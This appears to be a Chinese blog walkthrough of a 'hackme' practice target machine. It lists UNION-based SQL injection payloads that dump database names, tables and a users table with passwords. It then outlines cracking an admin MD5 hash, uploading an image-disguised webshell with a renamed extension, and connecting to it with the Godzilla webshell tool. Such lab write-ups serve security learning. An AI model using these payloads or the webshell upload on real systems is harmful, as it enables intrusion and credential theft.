目录扫描发现
该网址存放上传文件
注册一个账户,点击搜索
验证是否存在sql注入漏洞
Windows OS' and 1=1#
Windows OS' and 1=2#
存在sql注入漏洞 判断列数
Windows OS' order by 3#
Windows OS' order by 4#
所以,有3列;判断回显位置
-1'union select 1,2,3#
查看当前数据库:(webapphacking)
-1'union select database(),2,3#
查看库中的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
查看users表中的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#
查询这些字段
-1'union select group_concat(id,0x7e,user,0x7e,pasword,0x7e,name,0x7e,address),2,3 from users#
发现了一个超级admin用户,用md5解码解一下密码
登录超级用户
发现可以上传文件
文件上传漏洞
上传图片马到网站
抓包修改后缀
访问木马
将木马网址复制到哥斯拉中建立连接
连接成功
标签:union,0x7e,Windows,table,靶机,schema,select,hackme From: https://blog.csdn.net/weixin_69065643/article/details/140768316